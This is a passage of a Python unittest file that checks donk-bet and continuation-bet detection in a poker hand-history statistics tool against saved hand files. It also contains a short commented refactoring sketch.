self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XXBFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XBCRFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_db(self):
# folder containing the correct answers
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db(), msg=file + ' ' + strt + ' ' + plr)
def test_db_def_opp(self):
# folder containing the correct answers
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_def_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_db_raise_def_opp(self):
# folder containing the correct answers
folder = f + '/testy/rece/'
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_enum_db_def(self):
# folder containing the correct answers
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual('fold', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual('call', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual('fold', tmp.enum_db_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in3gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_def(),
msg=file + ' ' + strt + ' ' + plr)
def test_enum_db_raise_def(self):
# folder containing the expected answer files
folder = f + '/testy/rece/'
file = 'in2gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(None, tmp.enum_db_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
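# NOTE: hedged refactoring sketch (hypothetical helper, not used by the tests
# above or below). The repeated build-Db/Cb-then-assert pattern could be driven
# by a table mapping (street, player) pairs to expected results, using
# unittest's subTest so one failing street/player combination does not hide
# the others. `cls` would be Db or Cb and `method` an enum method name such as
# 'enum_db_def'; `hand` is an already-parsed Reka instance.
def _check_enum(testcase, cls, hand, file, method, cases):
    for (strt, plr), expected in cases.items():
        with testcase.subTest(file=file, strt=strt, plr=plr):
            tmp = cls(hand, strt, plr)
            testcase.assertEqual(expected, getattr(tmp, method)(),
                                 msg=file + ' ' + strt + ' ' + plr)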
class TestCBet(unittest.TestCase):
def test_cb_opp(self):
# folder containing the expected answer files
folder = f + '/testy/rece/'
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
